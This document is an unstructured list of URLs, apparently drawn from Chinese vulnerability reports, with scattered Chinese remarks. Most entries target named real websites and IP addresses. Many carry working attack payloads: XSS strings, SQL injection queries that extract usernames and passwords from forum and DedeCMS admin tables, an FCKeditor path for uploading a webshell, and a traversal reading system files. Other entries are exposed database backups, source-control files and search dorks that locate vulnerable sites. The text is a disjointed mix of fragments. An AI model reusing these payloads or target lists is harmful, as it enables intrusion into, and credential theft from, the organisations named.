http://open.tuniu.com/search?departDate=x%22%20onmouseover%3dalert%28%29%20x=%22&destination=%E6%B3%B0%E5%9B%BD&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?departDate=11&destination=x%20%22onmouseover=alert%28%29%20x=%22&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=\&departDate=&destination=&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1%27&destination=&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1%27&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1%27&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1&promotionPrice=1%27&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1&promotionPrice=1&travelType=1%27 http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1&promotionPrice=1&travelType=1%27 http://www.zyxlkz.gov.cn/newsView.aspx?oid=8&tid=0&id=436 http://www.zyxlkz.gov.cn/aboutUs.aspx?oid=1 http://www.zyxlkz.gov.cn/news.aspx?oid=1&tid=2 http://www.zyxlkz.gov.cn/newsPic.aspx?oid=2&tid=6 http://www.zyxlkz.gov.cn/gbook.aspx?oid=9&tid=23 http://zunyirc.cn/newsView.aspx?oid=12&tid=0&id=592 http://www.gzqyf.com/newsView.aspx?oid=13&tid=10&id=152 http://www.gzztgs.com/newsView.aspx?oid=6&tid=0&id=5 http://www.gzsjjy.net/newsView.aspx?oid=10&tid=0&id=354 http://www.zyblxx.com/newsView.aspx?oid=2&tid=5&id=357 http://www.rhsmtgz.com/newsView.aspx?oid=2&tid=34&id=488 http://www.syxzyy.com/newsView.aspx?oid=4&tid=9&id=60 http://www.lzchaye.com/newsView.aspx?oid=3&tid=0&id=174 http://114.135.10.227:85/newsView.aspx?oid=7&tid=31&id=463 http://www.gzyhg.com/newsView.aspx?oid=2&tid=1&id=1318 http://www.zaxls.com/newsView.aspx?oid=13&tid=39&id=584 http://www.zyrbc.com/newsView.aspx?oid=4&tid=8&id=473 http://www.mtrdb.gov.cn/newsView.aspx?oid=15&tid=29&id=567 http://www.bjzj.gov.cn/newsView.aspx?oid=1&tid=3&id=912 http://www.csscg.com.cn/newsView.aspx?oid=3&tid=6&id=437 http://www.bjszxxz.cn/newsView.aspx?oid=2&tid=26&id=403 http://www.zyxhyj.com/newsView.aspx?oid=6&tid=26&id=451 http://www.gzgsyjc.com/newsView.aspx?oid=6&tid=0&id=319 http://www.gzflof.com/newsView.aspx?oid=3&tid=10&id=201 http://www.zyxdqzx.com/newsView.aspx?oid=4&tid=6&id=113 http://zylxxsp.com/newsView.aspx?oid=1&tid=10&id=177 http://www.csbz.org/newsView.aspx?oid=8&tid=0&id=180 http://gzysljj.com/newsView.aspx?oid=5&tid=26&id=192 http://www.zgldmz.cn/newsView.aspx?oid=1&tid=9&id=121 http://www.yqxaxzx.com/newsView.aspx?oid=2&tid=2&id=731 http://bjszxxz.cn/newsView.aspx?oid=2&tid=6&id=465 http://www.mtxqxj.com/newsView.aspx?oid=2&tid=1&id=565 http://www.zywzjt.cn/newsView.aspx?oid=2&tid=15&id=160 http://jatoo.com.cn/newsView.aspx?oid=3&tid=13&id=38 http://jiazheng.zy96169.com/newsView.aspx?oid=2&tid=16&id=113 http://qz77.cn/newsView.aspx?oid=2&tid=12&id=109 http://www.hhgrd.gov.cn/newsView.aspx?oid=5&tid=23&id=339 http://csscg.com.cn/newsView.aspx?oid=4&tid=8&id=426 http://zyrbc.com/newsView.aspx?oid=4&tid=8&id=472 http://114.135.10.227:85/newsView.aspx?oid=7&ti http://www.cltt.org/pscmweb/Login.aspx http://gzkyz.handtrip.com/blog/my/module/news/ViewNews.jsp?blog_id=gzkyz&NewsId=351 http://118.85.207.74:8080/Login.jsp http://www.d3.com.cn/ http://weibo.com/jackyhuang168 http://www.qdlly.com/users/Checkucname.php?username= http://www.qdlly.com/users/resetpassword.php?dopost=getmb&username= http://www.wowsai.com/ www.wowsai.com http://manager.zjszmz.cn:8089 http://210.21.223.40/index.gch# android:versionCode="5730 android:versionName="5.7.3.0 http://drops.wooyun.org/papers/548 http://edu.teacher.com.cn/onlinere/youyu.jsp jar:/data/jdk/lib/tools.jar server:/data/jdk/jre/lib/amd64:/data/jdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/lib:/usr/lib http://java.sun.com/ http://kaixue.izhikang.com/admin.php,某活动的管理系统。 android:versionCode="5730 android:versionName="5.7.3.0 android:name="com.wuba.android.lib.util.commons.SharedPreferencesProvider android:authorities="com.wuba.android.provider.preference android:name="com.wuba.databaseprovider.AreaDBProvider android:authorities="com.wuba.android.provider.area android:name="com.wuba.thirdapps.kuaidi100.provider.ExpressHisProvider android:authorities="com.wuba.android.plugins.provider.KUAIDI100 android:name="com.wuba.im.IMChatProvider android:process=":downloadapkservice android:authorities="com.wuba.hybrid.chat android:name="com.wuba.databaseprovider.InquiryDBUpdateInBgProvider android:process=":downloadapkservice android:authorities="com.wuba.android.provider.data android:name="com.wuba.databaseprovider.UserActionDBProvider android:process=":downloadapkservice android:authorities="com.wuba.android.provider.useraction http://ca.ufida.com.cn:8080/user-ad/index.do http://jncc.nuaa.edu.cn/ http://jncc.nuaa.edu.cn/upload http://jncc.nuaa.edu.cn/plus/ http://jncc.nuaa.edu.cn/data/geili.php http://csjsxy.tjbys.com/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://bhzyxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://nkdxbhxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://hyzyxy.tjedu.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://zjxy.tjbys.net/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://bhzyjsxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://msxy.tjedu.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector url:http://bhzyxy.tjbys.com.cn/jobsys/user/reset.jsp)为例进行说明: http://bhzyxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector新建test目录并直接上传一句话至test目录 http://bhzyxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/Image/test/ http://bhzyxy.tjbys.com.cn/jobsys/UserFiles//Image/test/adminjsp.jsp http://218.196.240.120/list.aspx?id=165 http://202.98.116.80/luojihao/login.aspx http://vahhvahh.i.sohu.com/ http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=8 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.shunhengli.com:9090/witapprovemanage/report/comReimburse.jsp?comid=1 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.chnjcdc.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://115.29.234.197:8090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://119.145.194.122:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://www.ahwlh.com/page.php?act=news&id=24&idd=504 http://hbdjfy.gov.cn/page.php?act=shenwu&id=74&idd=3633 http://www.hbsjsbyy.com/page.php?act=news&id=22&idd=526 http://www.weishuiyuannongye.com/page.php?act=news&id=24&idd=2991 http://www.huaibeiyuxin.com/page.php?act=news&id=22&idd=414 http://www.zhongkangyuan.net/page.php?act=case&id=19&idd=162 http://www.boxinkemao.com/page.php?act=news&id=37&idd=399 http://www.ahhzjt.com/page.php?act=news&id=33&idd=623 http://www.xxkjxx.com/page.php?act=news&id=26&idd=473 http://www.jinsexitang.com/page.php?act=layout&id=49&idd=542 http://www.yshsjd.com/page.php?act=news&id=32&idd=993 http://www.hbsxmsysc.cn/page.php?act=news&id=24&idd=3292 http://www.hbcrjy.com/page.php?act=news&id=22&idd=589 http://www.sxbjamxh.com/page.php?act=news&id=22&idd=1001 http://www.ylscgyg.com/page.php?act=news&id=22&idd=751 http://www.ahcht.com/page.php?act=news&id=22&idd=935 http://www.hbdonjin.com/page.php?act=news&id=66&idd=556 http://rd.lieshan.gov.cn/page.php?act=news&id=24&idd=615 http://www.hbygjd.cn/page.php?act=news&id=22&idd=429 http://ahjjmp.l34.goodnic.net/page.php?act=news&id=22&idd=534 http://www.hbzdct.com/page.php?act=news&id=22&idd=576 http://www.ahrunshui.com/page.php?act=news&id=24&idd=626 http://www.mbawbfh.com/page.php?act=qie&id=60&idd=516 http://www.wangleigroup.com/page.php?act=news&id=22&idd=518 http://www.gaomeimuqiang.com/page.php?act=news&id=22&idd=531 http://www.hbbzy.net/page.php?act=news&id=22&idd=522 http://www.raiseschool.com/page.php?act=news&id=22&idd=467 http://www.wjwyxw.com/page.php?act=news&id=47&idd=550 http://yhjd123.com/page.php?act=news&id=22&idd=548 http://www.zhonghaost.com/page.php?act=news&id=22&idd=516 http://www.hz-ahu.com/page.php?act=news&id=22&idd=545 http://www.ahlxbz.com/page.php?act=news&id=32&idd=461 http://www.huiqianzi.net/page.php?act=news&id=18&idd=459 http://hbsjdq.com/page.php?act=news&id=22&idd=499 http://www.0561dn.com/page.php?act=news&id=22&idd=504 http://www.ahtxgk.net/page.php?act=news&id=22&idd=546 http://www.hbkxdt.com/page.php?act=news&id=22&idd=563 http://te66.cn/page.php?act=news&id=22&idd=495 https://211.137.251.50:8443/config/app https://github.com/ijse/Drag2Happy/blob/8b50f2fa9d26133bf1b0c64fb1aeaed92f4c2abb/old-version/sendMail.py http://172.16.0.134/bugfree/install/ http://www.Xiao5u.com/ http://www.Xiao5u.com/Demo/Company http://kami.sududa.com/tiqu/Tiqo.aspx?OrderID=703031234437911&Customer=malao002 http://kami.sududa.com/tiqu/Tiqo.aspx?OrderID=703031234437911&Customer=malao002 http://exe.sududa.com/exe/AgentManage.aspx http://exe.sududa.com/exe/SiteRead.aspx?Name=53322380@qq.com根据之前抓包的参数,?Name=xxxxxxxx@qq.com随便乱试了几个文件,发现有个文件好像可以读取代理商的信息。 http://exe.sududa.com/exe/TenpayShow.aspx android:versionCode="5730 android:versionName="5.7.3.0 http://www.xanet.net/case.php http://bbs.cndns.com//faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://bbs.sitestar.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://union.ly.com/project http://union.ly.com/,泄露联盟应用编辑页面,未授权访问,并可直接添加应用,涉及几百个同程网合作商。 http://58.68.245.5/ http://www.trhos.com/xyxyy/tr1403_content.asp?id=19 http://www.henansclf.org/web.rar http://www.henansclf.org/admin_in/webbjq/ http://sys.zs91.com/user/index http://www.jingtiangroup.com/about.php?id=7 http://www.jingtiangroup.com/product.php?sec_id=3001 http://www.jingtiangroup.com/news_info.php?id=17 http://www.jingtiangroup.com/news.php?sec_id=2001 http://www.ahtcfy.com/news.php?sec_id=2003 http://www.ahtcfy.com/about.php?id=7 http://www.ahtcfy.com/product.php?sec_id=9002 http://www.ahtcfy.com/news_info.php?id=430 http://www.ahjinniu.com/about.php?id=13 http://www.ahjinniu.com/product.php?sec_id=3001 http://www.ahjinniu.com/news.php?sec_id=2001 http://www.ahjinniu.com/news_info.php?id=113 http://www.wendujx.com/about.php?id=8 http://www.wendujx.com/news_info.php?id=47 http://www.wendujx.com/news.php?sec_id=2001 http://www.wendujx.com/product.php?sec_id=3001 http://ahwf.com.cn/product.php?sec_id=3007 http://ahwf.com.cn/news.php?sec_id=2001 http://ahwf.com.cn/about.php?id=1 http://ahwf.com.cn/news_info.php?id=111 http://banbeishui.com/news_info.php?id=450 http://banbeishui.com/about.php?id=2 http://banbeishui.com/news.php?sec_id=2026 http://www.lmssp.com/product.php?sec_id=3001 http://www.lmssp.com/news.php?sec_id=2006 http://www.lmssp.com/about.php?id=27 http://www.lmssp.com/news_info.php?id=249 http://www.tcantong.com/news_info.php?id=15 http://www.tcantong.com/about.php?id=2 http://www.tcantong.com/news.php?sec_id=2001 http://www.tcantong.com/product.php?sec_id=3001 http://www.huijincw.com/about.php?id=3 http://www.huijincw.com/news_info.php?id=30 http://www.huijincw.com/news.php?sec_id=2001 http://www.ahtcqx.cn/about.php?id=3 http://www.ahtcqx.cn/news_info.php?id=23 http://www.ahtcqx.cn/news.php?sec_id=2002 http://www.ahxinghua.com/news_info.php?id=46 http://www.ahxinghua.com/product.php?sec_id=3001 http://www.ahxinghua.com/news.php?sec_id=2001 http://www.ahxinghua.com/about.php?id=4 http://ahjszs.cn/news_info.php?id=4 http://ahjszs.cn/product.php?sec_id=3001 http://ahjszs.cn/news.php?sec_id=2001 http://ahjszs.cn/about.php?id=10 http://www.onefine.cn/product.php?sec_id=3001 http://www.onefine.cn/about.php?id=8 http://www.onefine.cn/news_info.php?id=173 http://www.onefine.cn/news.php?sec_id=2001 http://tchysj.com/about.php?id=3 http://tchysj.com/news.php?sec_id=2001 http://tchysj.com/product.php?sec_id=3001 http://www.qilongyou.com/about.php?id=2 http://www.qilongyou.com/news.php?sec_id=2001 http://www.qilongyou.com/news_info.php?id=97 http://111.202.**.**/login.php,发现账号里的钱已经用光了。 http://bbs.bee2c.com/uc_server http://gallery.artxun.com/index.php?module=gallery&act=edgallery&iid=101480&m=works&searchtype=1&keyword= http://demo.crm123.cn/Login.php登录系统 http://demo.crm123.cn/upload.php http://analytics.coolyun.com/analytics/Login.action http://www.ikang.com/ikang_app/ http://sh.loanchina.com//NewsStat/ http://www.loanchina.com/NewsStat/ http://123.139.154.143/tclc/index.jsp http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'1'='1 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'2'='1 com:116.255.143.131的 dede:20130922 http://bj.tuan800-inc.com9=3 http://cd.tuan800-inc.com9=3 http://cs.tuan800-inc.com9=3 http://club.189.cn http://agent.sc.189.cn/apk/ http://agent.sc.189.cn/apk/%cb%c4%b4%a8%b5%e7%d0%c5%d2%c6%b6%af%ca%dc%c0%ed%cf%b5%cd%b3%ba%f3%cc%a8%c5%e4%d6%c3%b2%d9%d7%f7%c5%e0%d1%b5%ca%d3%c6%b50602.wmv http://61.188.4.249:8080/ http://61.188.4.249:8080/chengdu/login.action http://61.188.4.249:8080/4g/login.action http://61.188.4.249:8080/4g/itv/businessdetail/detail.action?businessDetailId=13为例子 http://shop.jx.189.cn/common/search_filterIndex.action?query_object_id=9&shop_category_id=100008%22/%3E%3C/div%3E%3Cimg%20src=x http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=search&searchProductInfo.proName=%27asd%22/%3E%3Csvg/onload=alert http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=search&searchProductInfo.proName=%22/%3E%3Csvg/onload=alert%281%29%3E http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=type&searchProductInfo.productTypeId=%22/%3E%3Csvg/onload=alert http://shop.jx.189.cn/common/search_enter.action?searchProductInfo.method=search&searchProductInfo.proName=&searchProductInfo.orderDesc= http://shop.jx.189.cn/common/search_filterIndex.action?query_object_id=2&shop_category_id=100001%22/%3E%3Csvg/onload=alert http://shop.jx.189.cn/search/searchNumber.action http://shop.jx.189.cn/web/web/bagsBuy_set_index.action?productId=3935%22/%3E%3Csvg/onload=alert%28/x/%29%3E&optionalId=302&groupBuyFlag=true http://shop.jx.189.cn/web/web/bagsBuy_set_index.action?productId=3935%22/%3E%3Csvg/onload=alert%281%29%3E&optionalId=302&groupBuyFlag=true http://shop.ehuatai.com/pages/member/loginQueryPlicy.action http://ctyun.cn http://ccl.pku.edu.cn:8080/pos/Implication/administrator.jsp http://www.immomogame.com/mmzb/ https://game.immomo.com/register/?action=loginHorizontalPage https://game.immomo.com/register/?action=loginPage https://game.immomo.com/register/?action=login&uname= http://kf.bestpay.com.cn/zhij/imsystem/js/im-client.js http://kf.bestpay.com.cn/zhij/imsystem/js/ajax.js http://kf.bestpay.com.cn/zhij/imsystem/js/jquery.js http://XXXXX/Xsweb/_data/index_QueryStu.aspx http://www.runmain.cn/ http://lbs.189.cn/caches/bakup/default/phpcmstables_20130409_2817_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130312_1791_1.sql http://lbs.189.cn/caches/bakup/default/PHPCMS~1.SQL http://lbs.189.cn/caches/bakup/default/PHPCMS~2.SQL http://lbs.189.cn/caches/bakup/default/PHPCMS~3.SQL http://lbs.189.cn/caches/bakup/default/PHPCMS~4.SQL www.m10060.com http://www.m10060.com/common/manager/ http://www.m10060.com/common/phone/login.jsp http://www.sjzz.org.cn/ http://**.**.**/cjcx2/search.aspxexamsort=85&examdate=201405 http://1.85.59.22:8881/cjcx2/result.aspx?zj=8514611111 http://1.85.59.22:8881/cjcx2/result.aspx?zj=8514619999 www.ln10060.com http://www.ln10060.com/phone/login.jsp http://www.ln10060.com/manager/ http://www.ihs.ac.cn/cPI.asp?id=98 http://www.ihs.ac.cn/cPI.asp http://www.ihs.ac.cn/admin.asp http://www.ihs.ac.cn/bbs/data/dvbbs7.mdb http://111.75.198.119:9718/login.aspx http://www.hhmzw.com/xinxi/printpage.asp?id=993 http://218.85.65.35:9081/esa_web/jsp/service/news_mgr/NewsAction.do?ACTION_TYPE=detailNews&NEWS_ID=6736 http://218.85.65.35:9081/esa_web/jsp/service/news_mgr/.svn/entries http://218.85.65.35:9081/esa_web/jsp/ http://218.85.65.35:9081/esa_web/jsp/admin/scenic_area/new.jsp http://www.zgtzcs.com/ https://media.dreamhost.com/mp4/player.swf https://media.dreamhost.com/mp4/player.swf?debug=alert http://wzb.hebtu.edu.cn http://wzb.hebtu.edu.cn/zhengbing.php?id=24 http://www.seekfilm.com.cn/index.php/Member/orderShow/order_id/5100/ http://www.cdyjy.uestc.edu.cn http://www.cdyjy.uestc.edu.cn/phpmyadmin http://stock2.finance.sina.com.cn/sf/api/jsonp.php/aaa=johansen082447293183438691409578322670/dataService.getNoticeList?type=%E5%85%B6%E4%BB%96&index=1&court=&pageNum=undefined http://admin.ehaoyao.com/api.php http://www.qlcg.gov.cn/plus/recommenusdz.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.qlcg.gov.cn/data/目录,发现存在列目录漏洞 http://zone.wooyun.org/content/14945 POC:http://x55.me/cpframe0002.htm http://www.seekfilm.com.cn http://219.159.69.132/ http://219.159.69.132/sys/jigouzhanghu_add.aspx http://219.159.69.132/sys/xitongzhanghu_edit.aspx http://219.159.69.132/childpage/showfile.aspx?filepath=F:\\DeclareWeb\\WebFile\\UploadData\Downloads\2009841447312037.doc http://219.159.69.132/childpage/showfile.aspx?filepath=F:\\DeclareWeb\\WebFile\\images\img2\cbtntypbg.aspx http://60.30.247.222/sys/jigouzhanghu_add.aspx http://219.133.95.115/DS/sys/jigouzhanghu_add.aspx http://www.seekfilm.com.cn/index.php/ http://www.seekfilm.com.cn/index.php/Service/serviceCz/ http://www.seekfilm.com.cn/index.php/Member/address/id/87/ http://www.seekfilm.com.cn/index.php/Member/address/id/85/ http://www.jikexueyuan.com/study/170/lid/2.html http://bbs.eduu.com/forum.php?mod=viewthread&tid=2945802&pid=41432065&page=1&extra=#pid41432065 http://www.seekfilm.com.cn http://www.118320.com/cring/jsp/user/listener.jsp?ringId=135&type=1 http://www.sqlmap.org www.118320.com\session http://tg.tttuangou.net/changelog.txt http://tg.tttuangou.net/?mod=account&code=register http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.chnjcdc.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://115.29.234.197:8090/witapprovemanage/report/depReimburse.jsp?depid=1 http://119.145.194.122:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.shunhengli.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.chnjcdc.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://115.29.234.197:8090/system/monitorright/monitor_right_add.jsp?id=1 http://119.145.194.122:9090/system/monitorright/monitor_right_add.jsp?id=1 http://wenming.chinadaily.com.cn/News.aspx?sole=20140617174150703 http://wenming.chinadaily.com.cn/Single.aspx?sole=20140225121519187 http://wenming.chinadaily.com.cn/Single.aspx?sole=20140225121519187 http://job.ehuatai.com/hr/app/basic/resume.jsp?Job=20121030115009721512848&language=cn https://obooking.ctrip.com/oBooking/Order/Hotel/ViewOrder.asp?OrderID={携程订单号 http://www.tophr.net/news/index.asp?id=16364 http://9yang.bbs.woniu.com/forum.php?mod=viewthread&tid=4179&page=1&extra=#pid396225 http://event.shop.wanmei.com/qtshop/qtShopLoginAction.do http://event.shop.wanmei.com http://www.shenyangbus.com/ http://cl.chinaccd.net/cms/jieshao.php?jsid=1 http://cl.chinaccd.net/cms/article.php?action=show&id=110 http://www.hnmz.gov.cn/new/cms/jieshao.php?jsid=2 http://www.hnmz.gov.cn/new/cms/article.php?action=show&id=2481 http://www.cjpmp.com/cms/jieshao.php?jsid=2 http://www.cjpmp.com/cms/article.php?action=show&id=5 http://sh.chinaccd.net/new/cms/jieshao.php?jsid=2 http://sh.chinaccd.net/new/cms/article.php?action=list&typeid=2 http://tjj.chinaccd.net/renkou/cms/article.php?action=show&id=60 http://oa.kjkd.com http://202.38.193.235/zhinan/preLogin/login.aspx http://wooyun.org/bugs/wooyun-2010-061543 google:inurl:custom/CompanyCGList.aspx?ComId= http://baike.baidu.com/view/5293437.htm?fr=aladdin http://eps.alnan.com.cn/custom/CompanyCGList.aspx?ComId=1 http://eps.sinoma-cem.cn/custom/CompanyCGList.aspx?ComId=1 http://www.qlszb.com/custom/CompanyCGList.aspx?ComId=1 http://2013.autodesk.com.cn对应的服务器IP地址:http://42.96.185.28/ http://42.96.185.28/.svn/entries http://club.xincheping.com/index.php?a=AjaxXcp.AjaxCheckOldPwd http://www.chinaamc.com/zcms/Services/VoteResult_ZXLC_XDY.jsp http://qsmy.coco.cn/strategy/detail.php?id=9760 http://qsmy.coco.cn/strategy/detail.php?id=8041 http://qsmy.coco.cn/strategy/list.php?ser=%3D http://stock.finance.sina.com.cn/box/api/openapi.php/MoneyFinanceFundInfoService.fundcompare?code=000198 http://cblog.chinadaily.com.cn/home.php?mod=space&uid=1619413&do=blog&quickforward=1&id=4564841 http://xx.com\x22\x3e\x3c\x69\x66\x72\x61\x6d\x65\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e/1.swf[/flash http://msdn.microsoft.com/en-us/library/ms682425.aspx http://rus.autonavi.com/login.action http://www.hacjda.gov.cn/upload/Index.asp http://www.hacjda.gov.cn/upload/uploadfile/1.cer www.ibeifeng.com,ecshop系统 soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body soap:Envelope http://cvopen.chevip.com/ http://ops.ikang.com www.jnslyy.com/ShowAnn.asp?id=50 http://api3.hahapinche.com/api.php/Mobile/Html/my_score?user_id=39114 http://api3.hahapinche.com/api.php/Mobile/Html/my_score?user_id=39113 api.php/Mobile/Sign/sign_up http://v.umiwi.com/lib/play/?albumid=1120&id=6891 http://mail.meizu.com/ http://www.xxx.com/skywcm/webpage/download.jsp?absolutePath=C:%5Cboot.ini&downFileName=boot.ini http://www.njsports.gov.cn/skywcm/webpage/download.jsp?absolutePath=C:%5Cboot.ini&downFileName=boot.ini http://shop.jx.189.cn/web/policyDetailByUnitId.action?uniteId=827%27%20and%20%271%27=%271%27%20--%29 http://111.13.53.76:8090/ http://www.timber2005.com/ http://www.timber2005.com/Customer.html inurl:stu_user_regist.aspx http://www.ndddpx.com/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/System/Stu_User_Regist.aspx http://www.jzkjpx.cn/system/stu_user_regist.aspx http://zx.gzzkzsw.com/system/stu_user_regist.aspx http://exam.sccl.org.cn/system/stu_user_regist.aspx http://218.70.91.227/System/Stu_User_Regist.aspx http://42.96.174.127/system/stu_user_regist.aspx http://116.228.52.53/system/stu_user_regist.aspx http://www.lzpcc.com.cn/jxjy-exam/system/stu_user_regist.aspx http://ajws.gov.cn/system/stu_user_regist.aspx http://www.jmty.com.cn:8000/system/stu_user_regist.aspx http://www.pzxf.gov.cn/system/stu_user_regist.aspx www.ctcefive.com/ks/system/stu_user_regist.aspx http://exam.sohomusic.com.cn:86/system/stu_user_regist.aspx http://www.ncszfcg.gov.cn:8002/system/stu_user_regist.aspx http://px3.timber2005.com/System/Stu_User_Regist.aspx http://www.52edu.org/system/stu_user_regist.aspx http://px.mqxwdx.cn/System/Stu_User_Regist.aspx http://zxks.sdcoal.gov.cn/system/stu_user_regist.aspx http://219.150.186.78:91/Exam/system/stu_user_regist.aspx exam.iflysse.com/system/stu_user_regist.aspx test.pche.com.cn/system/stu_user_regist.aspx victormap.com/system/stu_user_regist.aspx px.fjzyjy.com/system/stu_user_regist.aspx www.haryk.com/system/stu_user_regist.aspx www.touhang123.com/system/stu_user_regist.aspx www.rcjxjy.com/system/stu_user_regist.aspx www.qkjx.qdedu.net:8012/PXSystem/Stu_User_Regist.aspx www.frpx.cn/system/stu_user_regist.aspx zx.shoueredu.com/system/stu_user_regist.aspx www.bjlfzg.com/system/stu_user_regist.aspx exam.sinopx.cn/system/stu_user_regist.aspx goldexam.com/system/stu_user_regist.aspx http://localhost/admin_sponsor.php inurl:wapindex.aspx http://kelink.com/ www.wapzz.cn做例子 www.wapzz.cn/admin/addTopWAPALL.aspx?path=360%E5%BA%93%E5%B8%A6%E8%AE%A1%E5%88%92&action=gomod&classid=0 www.wapzz.cn http://wapzz.cn/bbs/userguessbook.aspx?action=search&siteid=1000&classid=0&touserid=1835 http://www.xiangtan.gov.cn/comm/xiangtan_hd/shizhangxinxiang/szxx_hit.jsp?id=21833 http://www.xiangtan.gov.cn/login.jsp http://123.125.99.115//getSource.jsp?bq_name=-1 http://61.135.173.165/pingan/card/import/employee.csv http://www.ztehotel.com/admin/index.asp http://210.21.236.173/images/dm.aspx http://msdn.microsoft.com/en-us/library/ms682425.aspx http://123.125.97.103/index.jsp http://113.108.186.80/admin/login.asp URL:110.52.11.189:8080/systemAction!login.action inurl:/printpage.asp?ArticleID https://www.91wutong.com/index.php/home/dianzihetong/8/101000/1077/1000 http://www.szcw.cn/dealer/hr.php?id=259 http://211.99.221.166/ http://www.ahpfpc.gov.cn/ http://www.ahpfpc.gov.cn/page.php?fp=sch&key=0 www.t3.com.cn 